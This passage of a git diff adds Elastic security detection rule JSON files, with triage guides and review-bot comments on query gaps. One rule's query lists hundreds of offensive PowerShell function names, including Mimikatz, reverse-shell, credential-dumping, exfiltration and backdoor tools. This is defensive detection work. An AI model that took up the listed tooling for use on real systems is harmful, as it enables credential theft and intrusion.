entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, 
pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This rule may generate false positives if legitimate scripts or tools used by administrators contain any of the listed function names. 
These function names are commonly associated with offensive tooling, but they may also be present in benign scripts or tools.\n- To handle these false positives consider adding exceptions - preferably with a combination of full file path and users.\n\n### Related Rules\n\n- PowerShell Invoke-NinjaCopy script - b8386923-b02c-4b94-986a-d223d9b01f88\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Add-DomainGroupMember\" or \"Add-DomainObjectAcl\" or\n \"Add-RemoteConnection\" or \"Add-ServiceDacl\" or\n \"Add-Win32Type\" or \"Convert-ADName\" or\n \"Convert-LDAPProperty\" or \"ConvertFrom-LDAPLogonHours\" or\n \"ConvertFrom-UACValue\" or \"Copy-ArrayOfMemAddresses\" or\n \"Create-NamedPipe\" or \"Create-ProcessWithToken\" or\n \"Create-RemoteThread\" or \"Create-SuspendedWinLogon\" or\n \"Create-WinLogonProcess\" or \"Emit-CallThreadStub\" or\n \"Enable-SeAssignPrimaryTokenPrivilege\" or \"Enable-SeDebugPrivilege\" or\n \"Enum-AllTokens\" or \"Export-PowerViewCSV\" or\n \"Find-AVSignature\" or \"Find-AppLockerLog\" or\n \"Find-DomainLocalGroupMember\" or \"Find-DomainObjectPropertyOutlier\" or\n \"Find-DomainProcess\" or \"Find-DomainShare\" or\n \"Find-DomainUserEvent\" or \"Find-DomainUserLocation\" or\n \"Find-InterestingDomainAcl\" or \"Find-InterestingDomainShareFile\" or\n \"Find-InterestingFile\" or \"Find-LocalAdminAccess\" or\n \"Find-PSScriptsInPSAppLog\" or \"Find-PathDLLHijack\" or\n \"Find-ProcessDLLHijack\" or \"Find-RDPClientConnection\" or\n \"Get-AllAttributesForClass\" or \"Get-CachedGPPPassword\" or\n \"Get-DecryptedCpassword\" or \"Get-DecryptedSitelistPassword\" or\n \"Get-DelegateType\" or \"New-RelayEnumObject\" or\n \"Get-DomainDFSShare\" or \"Get-DomainDFSShareV1\" or\n \"Get-DomainDFSShareV2\" or \"Get-DomainDNSRecord\" or\n \"Get-DomainDNSZone\" or \"Get-DomainFileServer\" or\n \"Get-DomainForeignGroupMember\" or \"Get-DomainForeignUser\" or\n 
\"Get-DomainGPO\" or \"Get-DomainGPOComputerLocalGroupMapping\" or\n \"Get-DomainGPOLocalGroup\" or \"Get-DomainGPOUserLocalGroupMapping\" or\n \"Get-DomainGUIDMap\" or \"Get-DomainGroup\" or\n \"Get-DomainGroupMember\" or \"Get-DomainGroupMemberDeleted\" or\n \"Get-DomainManagedSecurityGroup\" or \"Get-DomainOU\" or\n \"Get-DomainObject\" or \"Get-DomainObjectAcl\" or\n \"Get-DomainObjectAttributeHistory\" or \"Get-DomainObjectLinkedAttributeHistory\" or\n \"Get-DomainPolicyData\" or \"Get-DomainSID\" or\n \"Get-DomainSPNTicket\" or \"Get-DomainSearcher\" or\n \"Get-DomainSite\" or \"Get-DomainSubnet\" or\n \"Get-DomainTrust\" or \"Get-DomainTrustMapping\" or\n \"Get-DomainUser\" or \"Get-DomainUserEvent\" or\n \"Get-Forest\" or \"Get-ForestDomain\" or\n \"Get-ForestGlobalCatalog\" or \"Get-ForestSchemaClass\" or\n \"Get-ForestTrust\" or \"Get-GPODelegation\" or\n \"Get-GPPAutologon\" or \"Get-GPPInnerField\" or\n \"Get-GPPInnerFields\" or \"Get-GPPPassword\" or\n \"Get-GptTmpl\" or \"Get-GroupsXML\" or\n \"Get-HttpStatus\" or \"Get-ImageNtHeaders\" or\n \"Get-Keystrokes\" or \"New-SOASerialNumberArray\" or \n \"Get-MemoryProcAddress\" or \"Get-MicrophoneAudio\" or\n \"Get-ModifiablePath\" or \"Get-ModifiableRegistryAutoRun\" or\n \"Get-ModifiableScheduledTaskFile\" or \"Get-ModifiableService\" or\n \"Get-ModifiableServiceFile\" or \"Get-Name\" or\n \"Get-NetComputerSiteName\" or \"Get-NetLocalGroup\" or\n \"Get-NetLocalGroupMember\" or \"Get-NetLoggedon\" or\n \"Get-NetRDPSession\" or \"Get-NetSession\" or\n \"Get-NetShare\" or \"Get-PEArchitecture\" or\n \"Get-PEBasicInfo\" or \"Get-PEDetailedInfo\" or\n \"Get-PathAcl\" or \"Get-PrimaryToken\" or\n \"Get-ProcAddress\" or \"Get-ProcessTokenGroup\" or\n \"Get-ProcessTokenPrivilege\" or \"Get-ProcessTokenType\" or\n \"Get-RegLoggedOn\" or \"Get-RegistryAlwaysInstallElevated\" or\n \"Get-RegistryAutoLogon\" or \"Get-RemoteProcAddress\" or\n \"Get-Screenshot\" or \"Get-ServiceDetail\" or\n \"Get-SiteListPassword\" or 
\"Get-SitelistField\" or\n \"Get-System\" or \"Get-SystemNamedPipe\" or\n \"Get-SystemToken\" or \"Get-ThreadToken\" or\n \"Get-TimedScreenshot\" or \"Get-TokenInformation\" or\n \"Get-TopPort\" or \"Get-UnattendedInstallFile\" or\n \"Get-UniqueTokens\" or \"Get-UnquotedService\" or\n \"Get-VaultCredential\" or \"Get-VaultElementValue\" or\n \"Get-VirtualProtectValue\" or \"Get-VolumeShadowCopy\" or\n \"Get-WMIProcess\" or \"Get-WMIRegCachedRDPConnection\" or\n \"Get-WMIRegLastLoggedOn\" or \"Get-WMIRegMountedDrive\" or\n \"Get-WMIRegProxy\" or \"Get-WebConfig\" or\n \"Get-Win32Constants\" or \"Get-Win32Functions\" or\n \"Get-Win32Types\" or \"Import-DllImports\" or\n \"Import-DllInRemoteProcess\" or \"Inject-LocalShellcode\" or\n \"Inject-RemoteShellcode\" or \"Install-ServiceBinary\" or\n \"Invoke-CompareAttributesForClass\" or \"Invoke-CreateRemoteThread\" or\n \"Invoke-CredentialInjection\" or \"Invoke-DllInjection\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-ImpersonateUser\" or\n \"Invoke-Kerberoast\" or \"Invoke-MemoryFreeLibrary\" or\n \"Invoke-MemoryLoadLibrary\" or\n \"Invoke-Mimikatz\" or \"Invoke-NinjaCopy\" or\n \"Invoke-PatchDll\" or \"Invoke-Portscan\" or\n \"Invoke-PrivescAudit\" or \"Invoke-ReflectivePEInjection\" or\n \"Invoke-ReverseDnsLookup\" or \"Invoke-RevertToSelf\" or\n \"Invoke-ServiceAbuse\" or \"Invoke-Shellcode\" or\n \"Invoke-TokenManipulation\" or \"Invoke-UserImpersonation\" or\n \"Invoke-WmiCommand\" or \"Mount-VolumeShadowCopy\" or\n \"New-ADObjectAccessControlEntry\" or \"New-DomainGroup\" or\n \"New-DomainUser\" or \"New-DynamicParameter\" or\n \"New-InMemoryModule\" or\n \"New-ThreadedFunction\" or \"New-VolumeShadowCopy\" or\n \"Out-CompressedDll\" or \"Out-EncodedCommand\" or\n \"Out-EncryptedScript\" or \"Out-Minidump\" or\n \"PortScan-Alive\" or \"Portscan-Port\" or\n \"Remove-DomainGroupMember\" or \"Remove-DomainObjectAcl\" or\n \"Remove-RemoteConnection\" or \"Remove-VolumeShadowCopy\" or\n \"Restore-ServiceBinary\" or 
\"Set-DesktopACLToAllowEveryone\" or\n \"Set-DesktopACLs\" or \"Set-DomainObject\" or\n \"Set-DomainObjectOwner\" or \"Set-DomainUserPassword\" or\n \"Set-ServiceBinaryPath\" or \"Sub-SignedIntAsUnsigned\" or\n \"Test-AdminAccess\" or \"Test-MemoryRangeValid\" or\n \"Test-ServiceDaclPermission\" or \"Update-ExeFunctions\" or\n \"Update-MemoryAddresses\" or \"Update-MemoryProtectionFlags\" or\n \"Write-BytesToMemory\" or \"Write-HijackDll\" or\n \"Write-PortscanOut\" or \"Write-ServiceBinary\" or\n \"Write-UserAddMSI\" or \"Invoke-Privesc\" or\n \"func_get_proc_address\" or \"Invoke-BloodHound\" or\n \"Invoke-HostEnum\" or \"Get-BrowserInformation\" or\n \"Get-DomainAccountPolicy\" or \"Get-DomainAdmins\" or\n \"Get-AVProcesses\" or \"Get-AVInfo\" or\n \"Get-RecycleBin\" or \"Invoke-BruteForce\" or\n \"Get-PassHints\" or \"Invoke-SessionGopher\" or\n \"Get-LSASecret\" or \"Get-PassHashes\" or\n \"Invoke-WdigestDowngrade\" or \"Get-ChromeDump\" or\n \"Invoke-DomainPasswordSpray\" or \"Get-FoxDump\" or\n \"New-HoneyHash\" or \"Invoke-DCSync\" or\n \"Invoke-PowerDump\" or \"Invoke-SSIDExfil\" or\n \"Invoke-PowerShellTCP\" or \"Add-Exfiltration\" or\n \"Do-Exfiltration\" or \"Invoke-DropboxUpload\" or\n \"Invoke-ExfilDataToGitHub\" or \"Invoke-EgressCheck\" or\n \"Invoke-PostExfil\" or \"Create-MultipleSessions\" or\n \"Invoke-NetworkRelay\" or \"New-GPOImmediateTask\" or\n \"Invoke-WMIDebugger\" or \"Invoke-SQLOSCMD\" or\n \"Invoke-SMBExec\" or \"Invoke-PSRemoting\" or\n \"Invoke-ExecuteMSBuild\" or \"Invoke-DCOM\" or\n \"Invoke-InveighRelay\" or \"Invoke-PsExec\" or\n \"Invoke-SSHCommand\" or \"Find-ActiveUsersWMI\" or\n \"Get-SystemDrivesWMI\" or \"Get-ActiveNICSWMI\" or\n \"Remove-Persistence\" or \"DNS_TXT_Pwnage\" or\n \"Execute-OnTime\" or \"HTTP-Backdoor\" or\n \"Add-ConstrainedDelegationBackdoor\" or \"Add-RegBackdoor\" or\n \"Add-ScrnSaveBackdoor\" or \"Gupt-Backdoor\" or\n \"Invoke-ADSBackdoor\" or \"Add-Persistence\" or\n \"Invoke-ResolverBackdoor\" or 
\"Invoke-EventLogBackdoor\" or\n \"Invoke-DeadUserBackdoor\" or \"Invoke-DisableMachineAcctChange\" or\n \"Invoke-AccessBinary\" or \"Add-NetUser\" or\n \"Invoke-Schtasks\" or \"Invoke-JSRatRegsvr\" or\n \"Invoke-JSRatRundll\" or \"Invoke-PoshRatHttps\" or\n \"Invoke-PsGcatAgent\" or \"Remove-PoshRat\" or\n \"Install-SSP\" or \"Invoke-BackdoorLNK\" or\n \"PowerBreach\" or \"InstallEXE-Persistence\" or\n \"RemoveEXE-Persistence\" or \"Install-ServiceLevel-Persistence\" or\n \"Remove-ServiceLevel-Persistence\" or \"Invoke-Prompt\" or\n \"Invoke-PacketCapture\" or \"Start-WebcamRecorder\" or\n \"Get-USBKeyStrokes\" or \"Invoke-KeeThief\" or\n \"Get-Keystrokes\" or \"Invoke-NetRipper\" or\n \"Get-EmailItems\" or \"Invoke-MailSearch\" or\n \"Invoke-SearchGAL\" or \"Get-WebCredentials\" or\n \"Start-CaptureServer\" or \"Invoke-PowerShellIcmp\" or\n \"Invoke-PowerShellTcpOneLine\" or \"Invoke-PowerShellTcpOneLineBind\" or\n \"Invoke-PowerShellUdp\" or \"Invoke-PowerShellUdpOneLine\" or\n \"Run-EXEonRemote\" or \"Download-Execute-PS\" or\n \"Out-RundllCommand\" or \"Set-RemoteWMI\" or\n \"Set-DCShadowPermissions\" or \"Invoke-PowerShellWMI\" or\n \"Invoke-Vnc\" or \"Invoke-LockWorkStation\" or\n \"Invoke-EternalBlue\" or \"Invoke-ShellcodeMSIL\" or\n \"Invoke-MetasploitPayload\" or \"Invoke-DowngradeAccount\" or\n \"Invoke-RunAs\" or \"ExetoText\" or\n \"Disable-SecuritySettings\" or \"Set-MacAttribute\" or\n \"Invoke-MS16032\" or \"Invoke-BypassUACTokenManipulation\" or\n \"Invoke-SDCLTBypass\" or \"Invoke-FodHelperBypass\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-EnvBypass\" or\n \"Get-ServiceUnquoted\" or \"Get-ServiceFilePermission\" or\n \"Get-ServicePermission\" or\n \"Enable-DuplicateToken\" or \"Invoke-PsUaCme\" or\n \"Invoke-Tater\" or \"Invoke-WScriptBypassUAC\" or\n \"Invoke-AllChecks\" or \"Find-TrustedDocuments\" or\n \"Invoke-Interceptor\" or \"Invoke-PoshRatHttp\" or\n \"Invoke-ExecCommandWMI\" or \"Invoke-KillProcessWMI\" or\n 
\"Invoke-CreateShareandExecute\" or \"Invoke-RemoteScriptWithOutput\" or\n \"Invoke-SchedJobManipulation\" or \"Invoke-ServiceManipulation\" or\n \"Invoke-PowerOptionsWMI\" or \"Invoke-DirectoryListing\" or\n \"Invoke-FileTransferOverWMI\" or \"Invoke-WMImplant\" or\n \"Invoke-WMIObfuscatedPSCommand\" or \"Invoke-WMIDuplicateClass\" or\n \"Invoke-WMIUpload\" or \"Invoke-WMIRemoteExtract\" or \"Invoke-winPEAS\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\")\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md", + "https://github.com/BC-SECURITY/Empire" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + 
"id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "cde1bafa-9f01-4f43-a872-605b678968b0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json new file mode 100644 index 00000000000..3de13898a70 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json 
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom 
ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json new file mode 100644 index 00000000000..f3d5d6eb730 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json 
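Review bot: The condition `process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*"` in the query of ce64d965-6cb0-466d-b74f-8d2c76f47f05_108.json only matches when the cmdlet name and the parameter end up in the same argument token; because `process.args` is an array with one entry per argument, an invocation where `-ActiveSyncAllowedDeviceIDs` is its own token would, as far as I can tell, not match. Consider additionally matching on the whole command line, `process.command_line : "*Set-CASMailbox*ActiveSyncAllowedDeviceIDs*"`, and listing `process.command_line` in `required_fields`. The same query is carried unchanged into ce64d965-6cb0-466d-b74f-8d2c76f47f05_109.json, which only narrows the index pattern to `logs-endpoint.events.process-*`, so the gap applies there too.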
@@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a 
custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json new file mode 100644 index 00000000000..6d6580bffbe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify activity related where adversaries can include a trap command which then allows programs and shells to specify commands that will be executed upon receiving interrupt signals.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Trap Signals Execution", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name == \"trap\" and process.args : \"SIG*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.005", + "name": "Trap", + "reference": "https://attack.mitre.org/techniques/T1546/005/" + } 
+ ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json new file mode 100644 index 00000000000..da4ac79fbc9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_111.json 
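Review bot: `process.name == "trap"` in the query of cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_2.json will, as far as I can tell, only fire when a file literally named trap is executed; in sh, bash and zsh `trap` is a shell builtin, so a `trap` line inside a script does not produce an exec event with that process name, and the rule's coverage should be documented as limited to that case. The description also reads awkwardly; suggest `"description": "Identifies the use of the trap command, which allows programs and shells to specify commands that will be executed upon receiving interrupt signals."`.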
@@ -0,0 +1,127 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution from Unusual Directory - Command Line", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 